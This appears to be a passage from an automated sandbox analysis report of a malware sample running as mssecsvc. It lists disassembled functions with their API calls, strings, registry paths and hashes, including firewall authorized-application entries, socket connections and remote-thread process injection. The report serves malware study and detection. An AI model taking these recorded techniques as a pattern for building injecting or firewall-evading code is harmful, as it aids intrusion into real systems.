                    • GetModuleHandleA.KERNEL32(7FEA3CBA), ref: 7FEA3CC2
                    • GetProcAddress.KERNEL32(00000000,00000002), ref: 7FEA3CD4
                    • GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                    • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                    • GetTickCount.KERNEL32 ref: 7FEA3D93
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$CountHandleLibraryLoadModuleTick
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 2837544101-504487454
                    • Opcode ID: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
                    • Instruction ID: b4b3212d39e947ac5d9392814a2c7224f35c85923ea667b823aff5088932c5b3
                    • Opcode Fuzzy Hash: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
                    • Instruction Fuzzy Hash: 45E11371519348BFEB229F708C4ABFA7BACEF41304F004559EC4A9E081D6F66F059762
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B03CC2 Relevance: 44.2, APIs: 20, Strings: 5, Instructions: 432libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleA.KERNEL32(00B03CBA), ref: 00B03CC2
                    • GetProcAddress.KERNEL32(00000000,00000002), ref: 00B03CD4
                    • GetProcAddress.KERNEL32(00000000,00B03D41), ref: 00B03D4C
                    • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B03D5F
                    • GetTickCount.KERNEL32 ref: 00B03D93
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$CountHandleLibraryLoadModuleTick
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 2837544101-504487454
                    • Opcode ID: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
                    • Instruction ID: 378d54b43414769907a859e61919a057c710afa5f578910c5255a9ff75fbbc65
                    • Opcode Fuzzy Hash: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
                    • Instruction Fuzzy Hash: 4AE10FB1518258BFEB25AF248C4EBEA7FECEF41700F004599E9499E0C2D7F45F4586A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA3CF0 Relevance: 44.2, APIs: 20, Strings: 5, Instructions: 409COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleA.KERNEL32(7FEA3CE5), ref: 7FEA3CF0
                    • GetSystemDirectoryA.KERNEL32(C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,00000104), ref: 7FEA3D07
                      • Part of subcall function 7FEA3D1F: lstrcat.KERNEL32(C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,7FEA3D12), ref: 7FEA3D20
                      • Part of subcall function 7FEA3D1F: GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                      • Part of subcall function 7FEA3D1F: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                      • Part of subcall function 7FEA3D1F: GetTickCount.KERNEL32 ref: 7FEA3D93
                      • Part of subcall function 7FEA3D1F: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressCountDirectoryHandleInformationLibraryLoadModuleProcSystemTickVolumelstrcat
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 215653160-504487454
                    • Opcode ID: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
                    • Instruction ID: 7541589ca8aef85322091197c42534de99d7bca435932005a89768fd23254656
                    • Opcode Fuzzy Hash: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
                    • Instruction Fuzzy Hash: 4CE1F171409348BFEB229F708C4ABFA7BACEF42304F004559EC4A9E091D6F66F0597A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B03CF0 Relevance: 44.2, APIs: 20, Strings: 5, Instructions: 409COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleA.KERNEL32(00B03CE5), ref: 00B03CF0
                    • GetSystemDirectoryA.KERNEL32(C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,00000104), ref: 00B03D07
                      • Part of subcall function 00B03D1F: lstrcat.KERNEL32(C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,00B03D12), ref: 00B03D20
                      • Part of subcall function 00B03D1F: GetProcAddress.KERNEL32(00000000,00B03D41), ref: 00B03D4C
                      • Part of subcall function 00B03D1F: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B03D5F
                      • Part of subcall function 00B03D1F: GetTickCount.KERNEL32 ref: 00B03D93
                      • Part of subcall function 00B03D1F: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00B06EF6,00000000,00000000,00000000,00000000), ref: 00B03E65
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressCountDirectoryHandleInformationLibraryLoadModuleProcSystemTickVolumelstrcat
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 215653160-504487454
                    • Opcode ID: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
                    • Instruction ID: 1aecaced767be6aae0fa585a575e6189f678f80356d3b31df001922be16858ca
                    • Opcode Fuzzy Hash: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
                    • Instruction Fuzzy Hash: 29E1DEB1518248BFEB25AF248C4EBEA7FECEF41700F004699E9499E0C2D7F45F4586A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA3D1F Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 389stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrcat.KERNEL32(C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,7FEA3D12), ref: 7FEA3D20
                      • Part of subcall function 7FEA3D36: LoadLibraryA.KERNEL32(7FEA3D2B), ref: 7FEA3D36
                      • Part of subcall function 7FEA3D36: GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                      • Part of subcall function 7FEA3D36: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                      • Part of subcall function 7FEA3D36: GetTickCount.KERNEL32 ref: 7FEA3D93
                      • Part of subcall function 7FEA3D36: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad$AddressCountInformationProcTickVolumelstrcat
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 2038497427-504487454
                    • Opcode ID: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
                    • Instruction ID: aa1c8551e8f76fbb525208f0bea2f920101e632125f5267fb1ed65396364aa08
                    • Opcode Fuzzy Hash: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
                    • Instruction Fuzzy Hash: A2E1F071419348BFEB229F748C4ABFA7BACEF42304F004559E84A9E081DAF66F059765
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B03D1F Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 389stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrcat.KERNEL32(C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,00B03D12), ref: 00B03D20
                      • Part of subcall function 00B03D36: LoadLibraryA.KERNEL32(00B03D2B), ref: 00B03D36
                      • Part of subcall function 00B03D36: GetProcAddress.KERNEL32(00000000,00B03D41), ref: 00B03D4C
                      • Part of subcall function 00B03D36: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B03D5F
                      • Part of subcall function 00B03D36: GetTickCount.KERNEL32 ref: 00B03D93
                      • Part of subcall function 00B03D36: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00B06EF6,00000000,00000000,00000000,00000000), ref: 00B03E65
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad$AddressCountInformationProcTickVolumelstrcat
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 2038497427-504487454
                    • Opcode ID: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
                    • Instruction ID: a933d1db4e2ffdd305746e8e437b22a3839cd693654d799fb68303d6e4dd10f7
                    • Opcode Fuzzy Hash: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
                    • Instruction Fuzzy Hash: 90E1EDB1518248BEEB25AF248C4EBEA3FECEF41700F004699E9499E0C2D7F45F4586A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA3D36 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 379libraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(7FEA3D2B), ref: 7FEA3D36
                      • Part of subcall function 7FEA3D4B: GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                      • Part of subcall function 7FEA3D4B: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                      • Part of subcall function 7FEA3D4B: GetTickCount.KERNEL32 ref: 7FEA3D93
                      • Part of subcall function 7FEA3D4B: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                    Strings
                    • ADVAPI32.DLL, xrefs: 7FEA3D5E
                    • C:,, xrefs: 7FEA3EF6, 7FEA3F08
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 7FEA3EDF, 7FEA3EF4, 7FEA3F0B, 7FEA4195, 7FEA41DB
                    • \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
                    • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FEA3F0C
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad$AddressCountInformationProcTickVolume
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 3734769084-504487454
                    • Opcode ID: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
                    • Instruction ID: 04a7c8116a9fb35f71bbffa2808c6274a5c5ffd0f068440cbef2dd7623ef1827
                    • Opcode Fuzzy Hash: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
                    • Instruction Fuzzy Hash: 9DD10071419348BFEB229F748C4ABFA7BACEF41304F004519E84A9E091DBF66F059765
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B03D36 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 379libraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(00B03D2B), ref: 00B03D36
                      • Part of subcall function 00B03D4B: GetProcAddress.KERNEL32(00000000,00B03D41), ref: 00B03D4C
                      • Part of subcall function 00B03D4B: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B03D5F
                      • Part of subcall function 00B03D4B: GetTickCount.KERNEL32 ref: 00B03D93
                      • Part of subcall function 00B03D4B: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00B06EF6,00000000,00000000,00000000,00000000), ref: 00B03E65
                    Strings
                    • C:,, xrefs: 00B03EF6, 00B03F08
                    • ADVAPI32.DLL, xrefs: 00B03D5E
                    • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00B03F0C
                    • \DEVICE\AFD\ENDPOINT, xrefs: 00B041DA
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 00B03EDF, 00B03EF4, 00B03F0B, 00B04195, 00B041DB
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad$AddressCountInformationProcTickVolume
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 3734769084-504487454
                    • Opcode ID: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
                    • Instruction ID: 4383889754621d187e23d11e909353867082635ea86425ecb227d76a4b595811
                    • Opcode Fuzzy Hash: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
                    • Instruction Fuzzy Hash: D9D1DCB1518249BEEB25AF248C4EBEA7FECEF41700F000699E9499E0C2D7F45F4587A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA3D4B Relevance: 40.6, APIs: 18, Strings: 5, Instructions: 386librarythreadnetworkCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                    • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                    • GetTickCount.KERNEL32 ref: 7FEA3D93
                    • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,000000C8), ref: 7FEA3EE2
                    • wsprintfA.USER32 ref: 7FEA3EF7
                    • CreateThread.KERNEL32(00000000,00000000,7FEA3691,00000000,00000000), ref: 7FEA3F40
                    • CloseHandle.KERNEL32(?,9C1F5710), ref: 7FEA3F49
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                    • CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                    • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                    • connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                    • GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                    • wsprintfA.USER32 ref: 7FEA4179
                    • SetEvent.KERNEL32(000002A4,?,00000000), ref: 7FEA42D6
                    • Sleep.KERNEL32(00007530,?,00000000), ref: 7FEA42F7
                    • ResetEvent.KERNEL32(000002A4,?,00000000), ref: 7FEA430A
                    Strings
                    • ADVAPI32.DLL, xrefs: 7FEA3D5E
                    • C:,, xrefs: 7FEA3EF6, 7FEA3F08
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 7FEA3EDF, 7FEA3EF4, 7FEA3F0B, 7FEA4195, 7FEA41DB
                    • \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
                    • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FEA3F0C
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateEvent$CloseHandleThreadwsprintf$AddressCountFileInformationLibraryLoadModuleNameProcResetSleepTickVersionVolumeconnectsocket
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 1567941233-504487454
                    • Opcode ID: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
                    • Instruction ID: 0fd1af5c82e6ac19fee7a4e27b5b7e3d4aaa516ddc9e53bac77035a7f4224d32
                    • Opcode Fuzzy Hash: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
                    • Instruction Fuzzy Hash: BBE1EF71419348BFEB229F748C4ABFA7BACEF41304F00465AEC4A9E081D6F66F059761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B03D4B Relevance: 40.6, APIs: 18, Strings: 5, Instructions: 386librarythreadnetworkCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcAddress.KERNEL32(00000000,00B03D41), ref: 00B03D4C
                    • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B03D5F
                    • GetTickCount.KERNEL32 ref: 00B03D93
                    • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00B06EF6,00000000,00000000,00000000,00000000), ref: 00B03E65
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,000000C8), ref: 00B03EE2
                    • wsprintfA.USER32 ref: 00B03EF7
                    • CreateThread.KERNEL32(00000000,00000000,00B03691,00000000,00000000), ref: 00B03F40
                    • CloseHandle.KERNEL32(?,9C1F5710), ref: 00B03F49
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00B03FE9
                    • CloseHandle.KERNEL32(?,00000000), ref: 00B03FF2
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00B03FFF
                    • socket.WS2_32(00000002,00000001,00000000), ref: 00B04097
                    • connect.WS2_32(6F6C6902,00B03B09,00000010), ref: 00B040B1
                    • GetVersionExA.KERNEL32(?,?,00000000), ref: 00B040FB
                    • wsprintfA.USER32 ref: 00B04179
                    • SetEvent.KERNEL32(000002A4,?,00000000), ref: 00B042D6
                    • Sleep.KERNEL32(00007530,?,00000000), ref: 00B042F7
                    • ResetEvent.KERNEL32(000002A4,?,00000000), ref: 00B0430A
                    Strings
                    • C:,, xrefs: 00B03EF6, 00B03F08
                    • ADVAPI32.DLL, xrefs: 00B03D5E
                    • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00B03F0C
                    • \DEVICE\AFD\ENDPOINT, xrefs: 00B041DA
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 00B03EDF, 00B03EF4, 00B03F0B, 00B04195, 00B041DB
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateEvent$CloseHandleThreadwsprintf$AddressCountFileInformationLibraryLoadModuleNameProcResetSleepTickVersionVolumeconnectsocket
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 1567941233-504487454
                    • Opcode ID: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
                    • Instruction ID: fdec5aee10634f836e63f4d43969f9c132763752476abd8c805dc52b88d9c469
                    • Opcode Fuzzy Hash: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
                    • Instruction Fuzzy Hash: CFE1EEB1518258BEEB25AF248C4EBEA3FECEF41700F004699E9499E0C2D7F45F4587A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA042D Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 290memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleA.KERNEL32(00000000), ref: 7FEA04BE
                    • GetVersion.KERNEL32 ref: 7FEA0500
                    • VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 7FEA0528
                    • CloseHandle.KERNEL32(?), ref: 7FEA05AD
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Handle$AllocCloseModuleVersionVirtual
                    • String ID: \BaseNamedObjects\itatVt$\BaseNamedObjects\itatVt$csrs
                    • API String ID: 3017432202-1607376603
                    • Opcode ID: c1a75dacefef55607d8e276d79dbd6456a9246beeb38c8f7a5af848b843aeecc
                    • Instruction ID: 79f95d2ebf0118f6fa098ab43f72169bd66920086d18faec8c3dc35e0dca6f1f
                    • Opcode Fuzzy Hash: c1a75dacefef55607d8e276d79dbd6456a9246beeb38c8f7a5af848b843aeecc
                    • Instruction Fuzzy Hash: 30B19D71506349FFEB229F24C849BFA3BA9FF45715F000128EA0A9E181C7F29B45CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA05F2 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 193stringnativeprocessCOMMON
                    Download Yara Rule
                    APIs
                    • CloseHandle.KERNEL32(?), ref: 7FEA05AD
                    • GetModuleHandleA.KERNEL32(7FEA05EC), ref: 7FEA05F2
                    • lstrcpyW.KERNEL32(\BaseNamedObjects\itatVt,\BaseNamedObjects\itatVt), ref: 7FEA070A
                    • lstrcpyW.KERNEL32(\BaseNamedObjects\itatVt,?), ref: 7FEA072D
                    • lstrcatW.KERNEL32(\BaseNamedObjects\itatVt,\itatVt), ref: 7FEA073B
                    • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 7FEA076B
                    • NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 7FEA0786
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 7FEA07C9
                    • Process32First.KERNEL32 ref: 7FEA07DC
                    • Process32Next.KERNEL32 ref: 7FEA07ED
                    • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA0805
                    • CreateRemoteThread.KERNEL32(?,00000000,00000000,-00003C38,00000002,00000000), ref: 7FEA0842
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA085D
                    • CloseHandle.KERNEL32 ref: 7FEA086C
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Handle$Close$CreateOpenProcessProcess32lstrcpy$FirstModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
                    • String ID: \BaseNamedObjects\itatVt$\BaseNamedObjects\itatVt$csrs
                    • API String ID: 1545766225-1607376603
